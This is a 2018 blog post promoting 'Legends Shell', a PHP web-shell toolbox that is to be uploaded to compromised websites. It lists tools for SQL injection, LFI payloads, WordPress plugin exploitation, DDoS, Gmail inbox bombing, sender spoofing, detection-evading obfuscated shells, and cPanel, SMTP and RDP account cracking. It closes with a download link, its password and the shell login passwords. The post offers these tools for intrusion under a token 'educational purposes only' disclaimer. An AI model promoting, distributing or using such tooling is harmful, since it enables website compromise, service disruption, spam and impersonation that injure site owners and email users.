Thursday, 11 January 2018

LEGENDS SHELL :: PORTABLE HACKING TOOLBOX [/.PHP]

[Image: KYM3txE.gif]
[Image: 90aVhZO.gif]
[Image: r39nvLV.png]Disclaimer:
Hacking is illegal. I take no responsibility what you do with this information. For educational purposes only.
LEGENDS SHELL:
A portable <.php> website hacking tool box packed with some useful tools and shells to help you hack more websites.
[Image: sCtYH34.jpg]
>Just upload it like you would any php shell.
>Login
>Import Tools
>Execute

►Featured Tools & Shells:

[Image: 9kq9HfM.jpg]

(¯`·._.·-☀TOOLS☀·._.·´¯)
    • • Login Page:
[Image: i6wcTUB.jpg]
Just in case someone comes across this through a public directory.

    • • Admin Page Finder:
[Image: eOS4FbF.jpg]
This tool is used to scan for administration panels.

    • • BING Dork Scanner:
[Image: uGMU1L2.jpg]
This tool is used to scan dorks on BING search engine for any SQLi vulnerabilities.

    • • CMS Sacnner:
[Image: kZ9XW27.jpg]
This tool scans a target for installed plugins and gives you a exploit-db link for that vulnerable plugin.

    • • LFI Scanner:
[Image: uGKBW4x.jpg]
This tool scans a target for any LFI vulnerabilities then let’s you inject different payloads.

    • • myBB Scanner:
[Image: l6tF87r.jpg]
This tool let’s you scan a mybb target for 21 known vulnerabilities.

    • • Prestashop Exploiter:

    • • Revslider Scanner:
[Image: rn5TObK.jpg]
This tool let’s you scan multiple WordPress sites at once for the vulnerable revslider plugin, then helps you exploit it.

    • • Vuln Scan:
[Image: Ob3z8eL.jpg]
This tool let’s you somewhat scan multiple websites/IP for vulnerabilities, then displays results to go through manually.

    • • Vuln Inject:
[Image: 7FKVj.jpg]
This tool has several features but the one that stands out the most is the Error based & Union SQLi injector.

    • • Host Scan:
[Image: aNtSvC3.jpg]
This tool let’s you scan any host, then displays the results.

    • • Reverse IP:
[Image: IvjUIFQ.jpg]
This tool let’s you scan a server/IP for any other websites that are being hosted on the same server.

    • • Ddoss3r:
[Image: LwvFAZE.jpg]
This tool uses multiple ddosing methods to kill target.

    • • Inbox Mailer -Gmail:
[Image: Lr1Yvnt.jpg]
This tool let’s you bomb/spam any Gmail ‘inbox’.

    • • Spoof Mailer:
[Image: uwK06pd.jpg]
This tool let’s you spoof your outging email address. ex:<support@facebook.com>

    • (¯`·._.·-☀SHELLS☀·._.·´¯)
    • • 404 Shell:
Spoiler (Click to Hide)
[Image: VWuSuYV.jpg]
This shell has a hidden login feature for better stealth.

    • • Mini Shell:
[Image: 0kiJNL2.jpg]
This shell is small in size making it easier to upload when other shells won’t load.

    • • Obfuscated Shell:
[Image: LtAPO8w.jpg]
Some servers will detect the malicious code within your shell preventing a successful upload. Sometimes you can bypass this by obfuscating the souce code.

    • • Symlink Shell:
[Image: kJGoGjN.jpg]
This shell will automatically symlink to any other websites being hosted on the server if /var/named or etc/named.conf is accessible.

    • • CGI Shell:
[Image: XoRE4IN.jpg]
If .php extensions are blocked/disabled, you can try to use a cgi shell.

    • • IndoXploit Shell:
This shell has many unique features, but the ones that stands out the most are…

• Configuration Grabber:
[Image: fwwxCe6.jpg]
[Image: BFbojaV.jpg]
Will check a compromised server for any other sites being hosted then exploit them if /var/named or etc/named.conf is accessible.
• cPanel Crack:
[Image: ZIQ2hGw.jpg]
Will attempt to crack any cPanels being hosted on a compromised server.
• SMTP Grabber:
[Image: gKCgJpw.jpg]
Will attempt to crack any smtp account hosted on a compromised server.• RDP Shell:
[Image: Q7rc1pq.jpg]
[Image: AduOMlb.jpg]
Will attempt to create an RPD account on a Windows server.

    • • Adminer -MySQL Manager:
[Image: gRwISvH.jpg]
Legends Shell:
https://ghostbin.com/paste/r8k3osuk
Ghostbin Password: legends4lyfe
Shell Passwords:
Legends Shell = opensaysme
404 shell = playtime2
IndoXploit Shell = IndoXploit

1 comment: